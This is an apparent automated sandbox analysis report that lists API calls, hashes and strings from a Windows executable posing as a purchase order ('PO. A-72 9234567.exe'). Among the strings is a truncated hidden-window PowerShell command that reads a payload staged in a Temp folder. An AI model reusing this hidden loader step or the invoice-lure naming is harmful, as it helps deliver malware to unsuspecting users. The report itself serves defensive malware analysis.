                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                  • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                  • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                  • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                  • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                  • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                  • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                  • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 2972824698-0
                                                • Opcode ID: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                • Opcode Fuzzy Hash: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E

                                                Non-executed Functions

                                                Function 004049B1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                  • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                  • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO. A-72 9234567.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                  • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                  • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\PO. A-72 9234567.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                  • Part of subcall function 004067EF: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                  • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                  • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                  • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                                • powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\re, xrefs: 004049CA
                                                • A, xrefs: 00404AD4
                                                • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\re
                                                • API String ID: 2624150263-1816356252
                                                • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405C76
                                                • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405CBE
                                                • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405CE1
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405CE7
                                                • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405CF7
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                                • "C:\Users\user\Desktop\PO. A-72 9234567.exe", xrefs: 00405C56
                                                • \*.*, xrefs: 00405CB8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\PO. A-72 9234567.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-888102528
                                                • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels, xrefs: 0040228E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels
                                                • API String ID: 542301482-2017472917
                                                • Opcode ID: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                • Opcode Fuzzy Hash: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                                Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                • DeleteObject.GDI32(00000000), ref: 00405027
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                  • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                • ShowWindow.USER32(?,00000005), ref: 00405189
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                • ShowWindow.USER32(?,00000000), ref: 00405511
                                                • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                • ShowWindow.USER32(00000000), ref: 00405523
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
